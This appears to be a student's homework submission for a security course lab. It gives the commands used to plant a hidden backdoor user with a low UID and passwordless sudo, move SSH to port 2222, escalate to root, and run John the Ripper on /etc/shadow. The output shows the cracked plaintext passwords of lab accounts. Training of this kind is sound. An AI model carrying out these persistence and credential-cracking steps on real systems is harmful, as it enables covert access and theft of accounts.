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Week 6 Homework Submission File: Advanced Bash - Owning the System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edit this file by adding the solution commands on the line below the prompt.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1: Shadow People**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 a secret user named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Make sure this user doesn't have a home folder created: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sudo adduser --no-create-home sysd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a password: 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sudo passwd sysd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a system UID &lt; 1000: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usermod -u 420 sysd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the same GID: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`Your solution command here`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groupadd -g 420 securityguy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usermod -g 420 sysd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full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access without the need for a password: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usermod -aG sudo sysd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visudo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User privilege specification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sysd    ALL=(ALL:ALL) NOPASSWD:ALL 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 that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access works without your password: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 sysd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-l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User sysd may run the following commands on scavenger-hunt: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ALL) NOPASSWD: ALL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ALL) ALL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2: Smooth Sailing**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`sshd_config`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nano /etc/ssh/sshd_config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Port 22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Port 2222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3: Testing Your Configuration Update**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Restart the SSH service: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systemctl restart ssh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exit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to the target machine using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sysd@192.168.6.105 -p 2222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switch to the root user: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sudo su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4: Crack All the Passwords**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back to the system using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sysd@192.168.6.105 -p 2222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Escalate your privileges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user. Use John to crack the entire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sudo su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john /etc/shadow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root@scavenger-hunt:/# john /etc/shadow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Created directory: /root/.john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Loaded 8 password hashes with 8 different salts (crypt, generic crypt(3)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?/64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Press 'q' or Ctrl-C to abort, almost any other key for status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sysd             (sysd)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computer         (stallman)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freedom          (babbage)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trustno1         (mitnik)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dragon           (lovelace)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lakers           (turing)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passw0rd         (sysadmin)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Goodluck!        (student)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 the "--show" option to display all of the cracked passwords reliably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Session completed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